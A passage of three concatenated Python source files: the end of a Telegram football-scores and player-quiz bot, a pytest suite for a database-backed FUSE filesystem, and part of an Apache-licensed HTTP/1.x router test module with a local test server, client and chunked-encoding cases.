user_msg = ChampionshipTable(url, table_width=9, table_height=15).create_table()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# UPL Scores
@bot.message_handler(regexp="⚽ UPL Upcoming Events")
def send_ua_scores(message):
url = "https://www.livescores.com/soccer/ukraine/premier-league/"
user_msg = ChampionshipScores(url).scrape_score()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# UPL Results (Last Week)
@bot.message_handler(regexp="⚽ UPL Latest Results")
def send_ua_latest(message):
url = "http://www.livescores.com/soccer/ukraine/premier-league/results/7-days/"
user_msg = ChampionshipLatest(url).parse_latest()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# Football Game Type
@bot.message_handler(regexp="⚽ Start the Game")
def send_football(m):
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('Guessing by the picture', 'Guessing by the career')
user_msg = 'Choose the type of the game'
bot.send_message(m.chat.id, user_msg, reply_markup=user_markup,
parse_mode="Markdown", disable_web_page_preview="True")
# ============== Guess Player by his/her Statistics (Poll) ==============
@bot.message_handler(regexp='Guessing by the career')
def guessing_game(message):
"""[note]:
Handles the mini-game
"""
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('⚽ Check Statistics', 'ℹ️ Help')
user_markup.row('Guessing by the picture', "Guessing by the career")
reply = gen_player()
text = "```" + str(reply[0]) + "```"
bot.send_message(message.chat.id, text, reply_markup=user_markup, parse_mode="MarkdownV2")
correct_answer = reply[1]
variants = [reply[1]]
for i in range(3):
flag = True
while flag:
temp = choice(list(open('players.txt', encoding='utf-8'))).replace('\n', '')
random_player = " ".join(temp.split("_"))
if random_player not in variants:
variants.append(random_player)
flag = False
shuffle(variants)
bot.send_poll(chat_id=message.chat.id, question="Try to guess the player, according to his career",
is_anonymous=True, options=variants, type="quiz",
correct_option_id=variants.index(correct_answer), reply_markup=user_markup,)
# ============== Guess Player by his/her picture ==============
@bot.message_handler(regexp='Guessing by the picture')
def guessing_game(message):
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('⚽ Check Statistics', 'ℹ️ Help')
user_markup.row('Guessing by the picture', "Guessing by the career")
reply = gen_player()
correct_answer = reply[1]
variants = [reply[1]]
for i in range(3):
flag = True
while flag:
temp = choice(list(open('players.txt', encoding='utf-8'))).replace('\n', '')
random_player = " ".join(temp.split("_"))
if random_player not in variants:
variants.append(random_player)
flag = False
shuffle(variants)
bot.send_photo(message.chat.id, reply[2])
bot.send_poll(chat_id=message.chat.id, question="Try to guess the player, according to his picture",
is_anonymous=True, options=variants, type="quiz",
correct_option_id=variants.index(correct_answer), reply_markup=user_markup,)
polling_thread = threading.Thread(target=bot_polling)
polling_thread.daemon = True
polling_thread.start()
# Keep main program running while bot runs threaded
if __name__ == "__main__":
while True:
try:
sleep(120)
except KeyboardInterrupt:
break
|
test_binary_filesystem.py
|
"""
test CRUD ops
put, list_dir, get, delete
"""
from os import environ, remove
from pytest import fixture, raises
import docker
import tempfile
from time import sleep
from multiprocessing import Process
from .brain import connect, r
from .brain.binary.data import put, get, list_dir, delete
from .brain.queries import RBF
from .brain.brain_pb2 import Binary
from .brain.binary import filesystem as bfs
from .test_put_and_get_binary import test_ensure_files_table_exists as check_files_table
CLIENT = docker.from_env()
TEST_FILE_NAME = "TEST_FILE.txt"
TEST_FILE_CONTENT = "content data is binary 灯火 标 and string stuff ".encode('utf-8')
@fixture(scope='module')
def rethink():
tag = environ.get("TRAVIS_BRANCH", "dev").replace("master", "latest")
container_name = "brainmoduletestFilesystem"
CLIENT.containers.run(
"ramrodpcp/database-brain:{}".format(tag),
name=container_name,
detach=True,
ports={"28015/tcp": 28015},
remove=True
)
check_files_table(None)
with tempfile.TemporaryDirectory() as tf:
p = Process(target=bfs.start_filesystem, args=(tf,))
p.start()
yield tf
p.terminate()
p.join(5)
# Teardown for module tests
containers = CLIENT.containers.list()
for container in containers:
if container.name == container_name:
container.stop()
break
def test_temp_folder_exists(rethink):
sleep(3) #account for fuse startup
assert rethink
def test_write_a_file(rethink):
if not environ.get("TRAVIS_BRANCH"):
with open("{}/{}".format(rethink, TEST_FILE_NAME), "wb") as f:
f.write(TEST_FILE_CONTENT)
sleep(2) #push to database is async after close
assert TEST_FILE_NAME in list_dir()
def test_read_a_file(rethink):
if not environ.get("TRAVIS_BRANCH"):
with open("{}/{}".format(rethink, TEST_FILE_NAME), "rb") as f:
local_file_content = f.read()
assert TEST_FILE_CONTENT == local_file_content
def test_delete_a_file(rethink):
"""
default filesystem remove is disabled by default
can be enabled by setting brain.binary.filesystem.ALLOW_REMOVE to true before launching the fs
:param rethink:
:return:
"""
if not environ.get("TRAVIS_BRANCH"):
remove("{}/{}".format(rethink, TEST_FILE_NAME))
sleep(4)
assert TEST_FILE_NAME in list_dir()
|
http1_tests.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import socket
import uuid
from threading import Thread
from time import sleep
try:
from http.server import HTTPServer, BaseHTTPRequestHandler
from http.client import HTTPConnection
from http.client import HTTPException
except ImportError:
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from httplib import HTTPConnection, HTTPException
from system_test import TestCase, TIMEOUT, Logger, Qdrouterd
TEST_SERVER_ERROR = "TestServer failed to start due to port %s already in use issue"
class RequestHandler(BaseHTTPRequestHandler):
"""
Dispatches requests received by the HTTPServer based on the method
"""
protocol_version = 'HTTP/1.1'
def _execute_request(self, tests):
for req, resp, val in tests:
if req.target == self.path:
xhdrs = None
if "test-echo" in self.headers:
xhdrs = {"test-echo":
self.headers["test-echo"]}
self._consume_body()
if not isinstance(resp, list):
resp = [resp]
for r in resp:
r.send_response(self, extra_headers=xhdrs)
self.server.request_count += 1
return
self.send_error(404, "Not Found")
def do_GET(self):
self._execute_request(self.server.system_tests["GET"])
def do_HEAD(self):
self._execute_request(self.server.system_tests["HEAD"])
def do_POST(self):
if self.path == "/SHUTDOWN":
self.send_response(200, "OK")
self.send_header("Content-Length", "13")
self.end_headers()
self.wfile.write(b'Server Closed')
self.wfile.flush()
self.close_connection = True
self.server.server_killed = True
return
self._execute_request(self.server.system_tests["POST"])
def do_PUT(self):
self._execute_request(self.server.system_tests["PUT"])
# these overrides just quiet the test output
# comment them out to help debug:
def log_request(self, code=None, size=None):
pass
def log_message(self, format=None, *args):
pass
def _consume_body(self):
"""
Read the entire body off the rfile. This must be done to allow
multiple requests on the same socket
"""
if self.command == 'HEAD':
return b''
for key, value in self.headers.items():
if key.lower() == 'content-length':
return self.rfile.read(int(value))
if key.lower() == 'transfer-encoding' \
and 'chunked' in value.lower():
body = b''
while True:
header = self.rfile.readline().strip().split(b';')[0]
hlen = int(header, base=16)
if hlen > 0:
data = self.rfile.read(hlen + 2) # 2 = \r\n
body += data[:-2]
else:
self.rfile.readline() # discard last \r\n
break
return body
return self.rfile.read()
class RequestHandler10(RequestHandler):
"""
RequestHandler that forces the server to use HTTP version 1.0 semantics
"""
protocol_version = 'HTTP/1.0'
class MyHTTPServer(HTTPServer):
"""
Adds a switch to the HTTPServer to allow it to exit gracefully
"""
def __init__(self, addr, handler_cls, testcases):
self.system_tests = testcases
self.request_count = 0
HTTPServer.__init__(self, addr, handler_cls)
def server_close(self):
try:
# force immediate close of listening socket
self.socket.shutdown(socket.SHUT_RDWR)
except Exception:
pass
HTTPServer.server_close(self)
class ThreadedTestClient(object):
"""
An HTTP client running in a separate thread
"""
def __init__(self, tests, port, repeat=1):
self._id = uuid.uuid4().hex
self._conn_addr = ("127.0.0.1:%s" % port)
self._tests = tests
self._repeat = repeat
self._logger = Logger(title="TestClient: %s" % self._id,
print_to_console=False)
self._thread = Thread(target=self._run)
self._thread.daemon = True
self.error = None
self.count = 0
self._thread.start()
def _run(self):
self._logger.log("TestClient connecting on %s" % self._conn_addr)
client = HTTPConnection(self._conn_addr, timeout=TIMEOUT)
self._logger.log("TestClient connected")
for loop in range(self._repeat):
self._logger.log("TestClient start request %d" % loop)
for op, tests in self._tests.items():
for req, _, val in tests:
self._logger.log("TestClient sending %s %s request" % (op, req.target))
req.send_request(client,
{"test-echo": "%s-%s-%s-%s" % (self._id,
loop,
op,
req.target)})
self._logger.log("TestClient getting %s response" % op)
try:
rsp = client.getresponse()
except HTTPException as exc:
self._logger.log("TestClient response failed: %s" % exc)
self.error = str(exc)
return
self._logger.log("TestClient response %s received" % op)
if val:
try:
body = val.check_response(rsp)
except Exception as exc:
self._logger.log("TestClient response invalid: %s"
% str(exc))
self.error = "client failed: %s" % str(exc)
return
if req.method == "BODY" and body != b'':
self._logger.log("TestClient response invalid: %s"
% "body present!")
self.error = "error: body present!"
return
self.count += 1
self._logger.log("TestClient request %s %s completed!" %
(op, req.target))
client.close()
self._logger.log("TestClient to %s closed" % self._conn_addr)
def wait(self, timeout=TIMEOUT):
self._thread.join(timeout=TIMEOUT)
self._logger.log("TestClient %s shut down" % self._conn_addr)
sleep(0.5) # fudge factor allow socket close to complete
def dump_log(self):
self._logger.dump()
class TestServer(object):
"""
A HTTPServer running in a separate thread
"""
@classmethod
def new_server(cls, server_port, client_port, tests, handler_cls=None):
num_attempts = 0
max_attempts = 4
while num_attempts < max_attempts:
try:
# Create an instance of TestServer. This might fail because the port has
# not been relinquished yet. Try for a max of 4 seconds before giving up.
server11 = TestServer(server_port=server_port,
client_port=client_port,
tests=tests,
handler_cls=handler_cls)
# Return the successfully created server.
return server11
except OSError:
# TestServer creation failed. Try again in one second, for a max of 4 seconds.
num_attempts += 1
sleep(1)
return None
def __init__(self, server_port, client_port, tests, handler_cls=None):
self._logger = Logger(title="TestServer", print_to_console=False)
self._client_port = client_port
self._server_addr = ("", server_port)
self._server = MyHTTPServer(self._server_addr,
handler_cls or RequestHandler,
tests)
self._server.allow_reuse_address = True
self._thread = Thread(target=self._run)
self._thread.daemon = True
self._thread.start()
def _run(self):
self._logger.log("TestServer listening on %s:%s" % self._server_addr)
try:
self._server.server_killed = False
while not self._server.server_killed:
self._server.handle_request()
except Exception as exc:
self._logger.log("TestServer %s crash: %s" %
(self._server_addr, exc))
raise
self._logger.log("TestServer %s:%s closed" % self._server_addr)
def wait(self, timeout=TIMEOUT):
self._logger.log("TestServer %s:%s shutting down" % self._server_addr)
self.request_count = 0
if self._thread.is_alive():
client = HTTPConnection("127.0.0.1:%s" % self._client_port,
timeout=TIMEOUT)
client.putrequest("POST", "/SHUTDOWN")
client.putheader("Content-Length", "0")
client.endheaders()
# 13 == len('Server Closed')
client.getresponse().read(13)
client.close()
self._thread.join(timeout=TIMEOUT)
if self._server:
self._server.server_close()
self.request_count = self._server.request_count
del self._server
sleep(0.5) # fudge factor allow socket close to complete
def http1_ping(sport, cport):
"""
Test the HTTP path by doing a simple GET request
"""
TEST = {
"GET": [
(RequestMsg("GET", "/GET/ping",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 4,
"Content-Type": "text/plain;charset=utf-8"},
body=b'pong'),
ResponseValidator(expect_body=b'pong'))
]
}
server = TestServer.new_server(sport, cport, TEST)
client = ThreadedTestClient(tests=TEST, port=cport)
client.wait()
server.wait()
return client.count, client.error
class ResponseMsg(object):
"""
A 'hardcoded' HTTP response message. This class writes its response
message when called by the HTTPServer via the BaseHTTPRequestHandler
"""
def __init__(self, status, version=None, reason=None,
headers=None, body=None, error=False):
self.status = status
self.version = version or "HTTP/1.1"
self.reason = reason
self.headers = headers or {}
self.body = body
self.error = error
def send_response(self, handler, extra_headers=None):
extra_headers = extra_headers or {}
if self.error:
handler.send_error(self.status,
message=self.reason)
return
handler.send_response(self.status, self.reason)
for key, value in self.headers.items():
handler.send_header(key, value)
for key, value in extra_headers.items():
handler.send_header(key, value)
handler.end_headers()
if self.body:
handler.wfile.write(self.body)
handler.wfile.flush()
class RequestMsg(object):
"""
A 'hardcoded' HTTP request message. This class writes its request
message to the HTTPConnection.
"""
def __init__(self, method, target, headers=None, body=None):
self.method = method
self.target = target
self.headers = headers or {}
self.body = body
def send_request(self, conn, extra_headers=None):
extra_headers = extra_headers or {}
conn.putrequest(self.method, self.target)
for key, value in self.headers.items():
conn.putheader(key, value)
for key, value in extra_headers.items():
conn.putheader(key, value)
conn.endheaders()
if self.body:
conn.send(self.body)
class ResponseValidator(object):
"""
Validate a response as received by the HTTP client
"""
def __init__(self, status=200, expect_headers=None, expect_body=None):
if expect_headers is None:
expect_headers = {}
self.status = status
self.expect_headers = expect_headers
self.expect_body = expect_body
def check_response(self, rsp):
if self.status and rsp.status != self.status:
raise Exception("Bad response code, expected %s got %s"
% (self.status, rsp.status))
for key, value in self.expect_headers.items():
if rsp.getheader(key) != value:
raise Exception("Missing/bad header (%s), expected %s got %s"
% (key, value, rsp.getheader(key)))
body = rsp.read()
if (self.expect_body and self.expect_body != body):
raise Exception("Bad response body expected %s got %s"
% (self.expect_body, body))
return body
class CommonHttp1Edge2EdgeTest(object):
def test_01_concurrent_requests(self):
"""
Test multiple concurrent clients sending streaming messages
"""
REQ_CT = 3 # 3 requests per TEST_*
TESTS_11 = {
"PUT": [
(RequestMsg("PUT", "/PUT/test_01_concurrent_requests_11",
headers={
"Transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"
},
# ~384K to trigger Q2
body=b'20000\r\n' + b'1' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'2' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'3' * 0x20000 + b'\r\n'
+ b'13\r\nEND OF TRANSMISSION\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(201, reason="Created",
headers={"Test-Header": "/PUT/test_01_concurrent_requests_11",
"Content-Length": "0"}),
ResponseValidator(status=201)
)],
"GET": [
(RequestMsg("GET", "/GET/test_01_concurrent_requests_11_small",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={
"Content-Length": "19",
"Content-Type": "text/plain;charset=utf-8",
"Test-Header": "/GET/test_01_concurrent_requests_11_small"
},
body=b'END OF TRANSMISSION'),
ResponseValidator(status=200)),
(RequestMsg("GET", "/GET/test_01_concurrent_requests_11",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={
"transfer-Encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8",
"Test-Header": "/GET/test_01_concurrent_requests_11"
},
# ~384K to trigger Q2
body=b'20000\r\n' + b'1' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'2' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'3' * 0x20000 + b'\r\n'
+ b'13\r\nEND OF TRANSMISSION\r\n'
+ b'0\r\n\r\n'),
ResponseValidator(status=200)
)],
}
TESTS_10 = {
"POST": [
(RequestMsg("POST", "/POST/test_01_concurrent_requests_10",
headers={"Content-Type": "text/plain;charset=utf-8",
"Content-Length": "393216"},
body=b'P' * 393197
+ b'END OF TRANSMISSION'),
ResponseMsg(201, reason="Created",
headers={"Test-Header": "/POST/test_01_concurrent_requests_10",
"Content-Length": "0"}),
ResponseValidator(status=201)
)],
"GET": [
(RequestMsg("GET", "/GET/test_01_concurrent_requests_10_small",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
# no content-length, server must close conn when done
headers={"Test-Header": "/GET/test_01_concurrent_requests_10_small",
"Content-Type": "text/plain;charset=utf-8"},
body=b'END OF TRANSMISSION'),
ResponseValidator(status=200)),
(RequestMsg("GET", "/GET/test_01_concurrent_requests_10",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Test-Header": "/GET/test_01_concurrent_requests_10",
"Content-Length": "393215",
"Content-Type": "text/plain;charset=utf-8"},
body=b'G' * 393196
+ b'END OF TRANSMISSION'),
ResponseValidator(status=200)
)],
}
server11 = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS_11)
self.assertIsNotNone(server11, TEST_SERVER_ERROR % self.http_server11_port)
server10 = TestServer.new_server(self.http_server10_port, self.http_listener10_port, TESTS_10,
handler_cls=RequestHandler10)
self.assertIsNotNone(server10, TEST_SERVER_ERROR % self.http_server10_port)
self.EA2.wait_connectors()
repeat_ct = 10
client_ct = 4 # per version
clients = []
for _ in range(client_ct):
clients.append(ThreadedTestClient(TESTS_11,
self.http_listener11_port,
repeat=repeat_ct))
clients.append(ThreadedTestClient(TESTS_10,
self.http_listener10_port,
repeat=repeat_ct))
for client in clients:
client.wait()
try:
self.assertIsNone(client.error)
self.assertEqual(repeat_ct * REQ_CT, client.count)
except Exception:
client.dump_log()
raise
server11.wait()
self.assertEqual(client_ct * repeat_ct * REQ_CT,
server11.request_count)
server10.wait()
self.assertEqual(client_ct * repeat_ct * REQ_CT,
server10.request_count)
def test_02_credit_replenish(self):
"""
Verify credit is replenished by sending > the default credit window
requests across the routers. The default credit window is 250
"""
TESTS = {
"GET": [
(RequestMsg("GET", "/GET/test_02_credit_replenish",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "24",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_02_credit_replenish'),
ResponseValidator(status=200),
),
]
}
server = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % self.http_server11_port)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS,
self.http_listener11_port,
repeat=300)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(300, client.count)
server.wait()
def test_03_server_reconnect(self):
"""
Verify server reconnect logic.
"""
TESTS = {
"GET": [
(RequestMsg("GET", "/GET/test_03_server_reconnect",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "24",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_03_server_reconnect'),
ResponseValidator(status=200),
),
]
}
# bring up the server and send some requests. This will cause the
# router to grant credit for clients
server = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % self.http_server11_port)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS,
self.http_listener11_port,
repeat=2)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(2, client.count)
# simulate server loss. Fire up a client which should be granted
# credit since the adaptor does not immediately teardown the server
# links. This will cause the adaptor to run qdr_connection_process
# without a raw connection available to wake the I/O thread..
server.wait()
client = ThreadedTestClient(TESTS,
self.http_listener11_port,
repeat=2)
# the adaptor will detach the links to the server if the connection
# cannot be reestablished after 2.5 seconds. Restart the server before
# that occurrs to prevent client messages from being released with 503
# status.
server = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % self.http_server11_port)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(2, client.count)
server.wait()
def test_04_server_pining_for_the_fjords(self):
"""
Test permanent loss of server
"""
TESTS = {
"GET": [
(RequestMsg("GET", "/GET/test_04_fjord_pining",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "20",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_04_fjord_pining'),
ResponseValidator(status=200),
),
]
}
# bring up the server and send some requests. This will cause the
# router to grant credit for clients
server = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % self.http_server11_port)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS, self.http_listener11_port)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(1, client.count)
TESTS_FAIL = {
"GET": [
(RequestMsg("GET", "/GET/test_04_fjord_pining",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "20",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_04_fjord_pining'),
ResponseValidator(status=503),
),
]
}
# Kill the server then issue client requests. These requests will be
# held on the server's outgoing links until they expire (2.5 seconds).
# At that point the client will receive a 503 response.
server.wait()
client = ThreadedTestClient(TESTS_FAIL, self.http_listener11_port)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(1, client.count)
# ensure links recover once the server re-appears
server = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % self.http_server11_port)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS, self.http_listener11_port)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(1, client.count)
server.wait()
def test_05_large_streaming_msg(self):
"""
Verify large streaming message transfer
"""
TESTS_11 = {
"PUT": [
(RequestMsg("PUT", "/PUT/streaming_test_11",
headers={
"Transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"
},
# 4 chunks each ~= 600K
body=b'927C1\r\n' + b'0' * 0x927C0 + b'X\r\n'
+ b'927C0\r\n' + b'1' * 0x927C0 + b'\r\n'
+ b'927C1\r\n' + b'2' * 0x927C0 + b'X\r\n'
+ b'927C0\r\n' + b'3' * 0x927C0 + b'\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "data",
"Content-Length": "0"}),
ResponseValidator(status=201))
],
"GET": [
(RequestMsg("GET", "/GET/streaming_test_11",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={
"transfer-Encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"
},
# two 1.2MB chunk
body=b'124f80\r\n' + b'4' * 0x124F80 + b'\r\n'
+ b'124f80\r\n' + b'5' * 0x124F80 + b'\r\n'
+ b'0\r\n\r\n'),
ResponseValidator(status=200))
],
}
TESTS_10 = {
"POST": [
(RequestMsg("POST", "/POST/streaming_test_10",
headers={"Header-1": "H" * 2048,
"Content-Length": "2097155",
"Content-Type": "text/plain;charset=utf-8"},
body=b'P' * 2097155),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "data",
"Content-Length": "0"}),
ResponseValidator(status=201))
],
"GET": [
(RequestMsg("GET", "/GET/streaming_test_10",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "1999999",
"Content-Type": "text/plain;charset=utf-8"},
body=b'G' * 1999999),
ResponseValidator(status=200))
],
}
server11 = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS_11)
self.assertIsNotNone(server11, TEST_SERVER_ERROR % self.http_server11_port)
server10 = TestServer.new_server(self.http_server10_port, self.http_listener10_port, TESTS_10,
handler_cls=RequestHandler10)
self.assertIsNotNone(server10, TEST_SERVER_ERROR % self.http_server10_port)
self.EA2.wait_connectors()
client11 = ThreadedTestClient(TESTS_11,
self.http_listener11_port,
repeat=2)
client11.wait()
self.assertIsNone(client11.error)
self.assertEqual(4, client11.count)
client10 = ThreadedTestClient(TESTS_10,
self.http_listener10_port,
repeat=2)
client10.wait()
self.assertIsNone(client10.error)
self.assertEqual(4, client10.count)
server11.wait()
server10.wait()
class CommonHttp1OneRouterTest(object):
TESTS_11 = {
#
# GET
#
"GET": [
(RequestMsg("GET", "/GET/error",
headers={"Content-Length": 0}),
ResponseMsg(400, reason="Bad breath", error=True),
ResponseValidator(status=400)),
(RequestMsg("GET", "/GET/no_content",
headers={"Content-Length": 0}),
ResponseMsg(204, reason="No Content"),
ResponseValidator(status=204)),
(RequestMsg("GET", "/GET/content_len",
headers={"Content-Length": "00"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 1,
"Content-Type": "text/plain;charset=utf-8"},
body=b'?'),
ResponseValidator(expect_headers={'Content-Length': '1'},
expect_body=b'?')),
(RequestMsg("GET", "/GET/content_len_511",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 511,
"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 511),
ResponseValidator(expect_headers={'Content-Length': '511'},
expect_body=b'X' * 511)),
(RequestMsg("GET", "/GET/content_len_4096",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 4096,
"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 4096),
ResponseValidator(expect_headers={'Content-Length': '4096'},
expect_body=b'X' * 4096)),
(RequestMsg("GET", "/GET/chunked",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"},
# note: the chunk length does not count the trailing CRLF
body=b'16\r\n'
+ b'Mary had a little pug \r\n'
+ b'1b\r\n'
+ b'Its name was "Skupper-Jack"\r\n'
+ b'0\r\n'
+ b'Optional: Trailer\r\n'
+ b'Optional: Trailer\r\n'
+ b'\r\n'),
ResponseValidator(expect_headers={'transfer-encoding': 'chunked'},
expect_body=b'Mary had a little pug Its name was "Skupper-Jack"')),
(RequestMsg("GET", "/GET/chunked_large",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"},
# note: the chunk length does not count the trailing CRLF
body=b'1\r\n'
+ b'?\r\n'
+ b'800\r\n'
+ b'X' * 0x800 + b'\r\n'
+ b'13\r\n'
+ b'Y' * 0x13 + b'\r\n'
+ b'0\r\n'
+ b'Optional: Trailer\r\n'
+ b'Optional: Trailer\r\n'
+ b'\r\n'),
ResponseValidator(expect_headers={'transfer-encoding': 'chunked'},
expect_body=b'?' + b'X' * 0x800 + b'Y' * 0x13)),
(RequestMsg("GET", "/GET/info_content_len",
headers={"Content-Length": 0}),
[ResponseMsg(100, reason="Continue",
headers={"Blab": 1, "Blob": "?"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 1,
"Content-Type": "text/plain;charset=utf-8"},
body=b'?')],
ResponseValidator(expect_headers={'Content-Type': "text/plain;charset=utf-8"},
expect_body=b'?')),
# (RequestMsg("GET", "/GET/no_length",
# headers={"Content-Length": "0"}),
# ResponseMsg(200, reason="OK",
# headers={"Content-Type": "text/plain;charset=utf-8",
# "connection": "close"
# },
# body=b'Hi! ' * 1024 + b'X'),
# ResponseValidator(expect_body=b'Hi! ' * 1024 + b'X')),
],
#
# HEAD
#
"HEAD": [
(RequestMsg("HEAD", "/HEAD/test_01",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"},
body=None),
ResponseValidator(expect_headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"})
),
(RequestMsg("HEAD", "/HEAD/test_02",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-1": "Value 01",
"Transfer-Encoding": "chunked",
"App-Header-2": "Value 02"}),
ResponseValidator(expect_headers={"App-Header-1": "Value 01",
"Transfer-Encoding": "chunked",
"App-Header-2": "Value 02"})),
(RequestMsg("HEAD", "/HEAD/test_03",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-3": "Value 03"}),
ResponseValidator(expect_headers={"App-Header-3": "Value 03"})),
],
#
# POST
#
"POST": [
(RequestMsg("POST", "/POST/test_01",
headers={"App-Header-1": "Value 01",
"Content-Length": "19",
"Content-Type": "application/x-www-form-urlencoded"},
body=b'one=1&two=2&three=3'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever",
"Transfer-Encoding": "chunked"},
body=b'8\r\n'
+ b'12345678\r\n'
+ b'f\r\n'
+ b'abcdefghijklmno\r\n'
+ b'000\r\n'
+ b'\r\n'),
ResponseValidator(expect_body=b'12345678abcdefghijklmno')
),
(RequestMsg("POST", "/POST/test_02",
headers={"App-Header-1": "Value 01",
"Transfer-Encoding": "chunked"},
body=b'01\r\n'
+ b'!\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever",
"Content-Length": "9"},
body=b'Hi There!'),
ResponseValidator(expect_body=b'Hi There!')
),
],
#
# PUT
#
"PUT": [
(RequestMsg("PUT", "/PUT/test_01",
headers={"Put-Header-1": "Value 01",
"Transfer-Encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"},
body=b'80\r\n'
+ b'$' * 0x80 + b'\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever",
"Content-length": "3"},
body=b'ABC'),
ResponseValidator(status=201, expect_body=b'ABC')
),
(RequestMsg("PUT", "/PUT/test_02",
headers={"Put-Header-1": "Value 01",
"Content-length": "0",
"Content-Type": "text/plain;charset=utf-8"}),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever",
"Transfer-Encoding": "chunked"},
body=b'1\r\n$\r\n0\r\n\r\n'),
ResponseValidator(status=201, expect_body=b'$')
),
]
}
# HTTP/1.0 compliant test cases (no chunked, response length unspecified)
TESTS_10 = {
#
# GET
#
"GET": [
(RequestMsg("GET", "/GET/error",
headers={"Content-Length": 0}),
ResponseMsg(400, reason="Bad breath", error=True),
ResponseValidator(status=400)),
(RequestMsg("GET", "/GET/no_content",
headers={"Content-Length": 0}),
ResponseMsg(204, reason="No Content"),
ResponseValidator(status=204)),
(RequestMsg("GET", "/GET/content_len_511",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 511,
"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 511),
ResponseValidator(expect_headers={'Content-Length': '511'},
expect_body=b'X' * 511)),
(RequestMsg("GET", "/GET/content_len_4096",
headers={"Content-Length": 0}),
